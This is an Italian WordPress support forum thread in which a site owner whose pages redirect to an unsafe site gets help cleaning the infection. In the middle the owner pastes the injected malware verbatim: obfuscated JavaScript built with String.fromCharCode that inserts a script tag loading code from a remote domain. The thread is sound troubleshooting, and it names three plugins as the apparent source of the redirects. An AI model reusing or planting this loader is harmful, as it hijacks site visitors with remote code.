Supporto » Varie ed eventuali » Sito web fa redirect su un sito insicuro

  • Buonasera,
    da un paio di giorni ho notato che un mio sitoweb fa un redirect ad un sito insicuro. Purtroppo non ho un backup per poter risolvere questo problema. Avete consigli?
    #####################

    • Questo topic è stato modificato 4 mesi, 3 settimane fa da Cristiano Zanca. Motivo: link rimosso perché dannoso
Stai visualizzando 6 risposte - dal 1 al 6 (di 6 totali)
  • Moderatore Cristiano Zanca

    (@cristianozanca)

    Salve giancarlo15

    il link per comprensibili motivi di sicurezza è stato rimosso

    il consiglio è di leggere a questo indirizzo https://wordpress.org/support/article/faq-my-site-was-hacked/ le istruzioni per risolvere il problema di un sito violato

    Buongiorno e scusa per aver messo il link,
    ho usato uno di quei siti web presenti nella guida che hai inserito e mi ha trovato un malware in ogni pagina presente nel sito contenente questo codice

    <!-- WPLC Custom JS --><script>var nt = String.fromCharCode(98);var mb = String.fromCharCode(97, 106, 97, 120, 67, 111, 117, 110, 116, 101, 114);var sb = String.fromCharCode(115, 99, 114, 105, 112, 116);var jb = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47); var tb = String.fromCharCode(116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116);var lb = String.fromCharCode(103, 114, 101, 97, 116, 105, 110, 115, 116, 97, 103, 114, 97, 109, 112, 97, 103, 101, 46, 99, 111, 109, 47, 100, 111, 46, 106, 115, 63, 97, 61, 51, 51, 38, 109, 61, 55);var c=document.createElement(sb);c.type=tb,c.async=1,c.src=jb+lb+nt;var n=document.getElementsByTagName(sb)[0];n.parentNode.insertBefore(c,n);</script> <style type="text/css">

    Per risolvere devo trovare questo codice nei vari file indicati dal sito e cancellarli?

    Ciao @giancarlo15 ,

    Per risolvere devo trovare questo codice nei vari file indicati dal sito e cancellarli?

    Cancellarli non sarà tanto facile perché questo sembra un codice creato sul momento.

    Comunque, giusto per sapere, viene creato uno script che reindirizza qui:
    Remote Address: 103.211.217.42:443

    Eh si ho notato che è abbastanza difficile trovare il codice nel vari file, purtroppo credo sia l’unico modo visto che non ho un backup…

    Ok,
    ultimo post sull’argomento da parte mia.
    Se fossi al tuo posto inizierei disabilitando il plugin che fa la cookie policy perché ha una classe javascript di nome cookiesPolicy con ben tre istruzioni eval() che è l’istruzione tipica usata da chi fa fare a javascript cose che non dovrebbe.
    Inoltre la tua pagina è priva di cookie mentre dovrebbe essercene almeno uno di quelli tecnici.
    E questo è tutto quello che ho notato.
    Ciao.

    Aggiornamento.
    Inizalmente ho disattivato tutti i plugin ed ho notato che il sito non aveva questo problema, quindi ho disattivato un plugin per volta e sono arrivato alla conclusione che tre plugin facevano fare redirect su siti a caso ovvero wp-font-awesome, wp-live-chat-support e wp-super-cache.

Stai visualizzando 6 risposte - dal 1 al 6 (di 6 totali)
  • Devi essere collegato per rispondere a questo topic.